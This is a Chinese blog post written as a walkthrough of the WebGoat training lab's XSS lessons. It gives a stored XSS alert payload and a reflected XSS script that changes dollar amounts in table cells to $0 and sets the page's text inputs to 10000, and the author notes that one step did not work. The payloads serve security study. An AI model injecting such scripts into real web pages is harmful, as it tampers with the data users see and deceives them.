现在的位置: 首页 > 综合 > 正文

WebGoat——XSS Attacks（part 2）

2012年08月13日 ⁄ 综合 ⁄ 共 953字 ⁄ 字号小中大 ⁄ 评论关闭

1、存储型

脚本：><script>alert('just for fun')</script>

------------------------------------------------------------------------------------------------------------------------------------------------------------

2、反射型

题意：通过反射型XSS，修改页面数据来达到攻击的目的。

（有点难度，参考答案做的。。。）

代码如下

'><script>
alert('This kinda is called reflected XSS or First-Order XSS!');
for(i=0;i<=document.getElementsByTagName("td").length-1;i++)
{
	if(document.getElementsByTagName("td")[i].innerHTML.indexOf('$')>0)
	{
		document.getElementsByTagName("td")[i].innerHTML = '$0';<!--找到$符号，将$符号后面的值都替换为0-->
	}
};
for(i=0;i<=document.getElementsByTagName("input").length-1;i++)
{
	if(document.getElementsByTagName("input")[i].type=='text')
	{
		document.getElementsByTagName("input")[i].value='10000';<!--找到文本域（text），将文本域里的值都替换为10000-->
	}
};
</script>

效果：

第一个篡改，修改$后值为0，不知道为什么没有生效。。。原因还不晓得。。。。

------------------------------------------------------------------------------------------------------------------------------------------------------------

【上篇】两个Objective-C的收发Email代码
【下篇】第九周项目三——分数类中的运算符重载（利用输入输出运算符重载）

作者: firman

该日志由 firman 于12年前发表在综合分类下，最后更新于 2012年08月13日.
转载请注明: WebGoat——XSS Attacks（part 2） | 学步园 +复制链接

抱歉!评论已关闭.

学步园

WebGoat——XSS Attacks（part 2）

1、存储型

2、反射型

作者: firman

书签

最新文章New

本站推荐

返回首页